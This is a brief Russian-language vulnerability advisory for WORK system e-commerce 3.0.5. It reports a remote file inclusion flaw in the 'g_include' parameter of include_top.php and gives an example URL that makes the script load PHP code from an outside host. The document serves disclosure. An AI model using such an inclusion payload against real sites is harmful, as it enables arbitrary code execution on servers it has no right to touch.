Программа: WORK system e-commerce 3.0.5

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «g_include» сценарием include_top.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://example/[WORK_system_path]/include/include_top.php?g_include=http://shell



Оставить мнение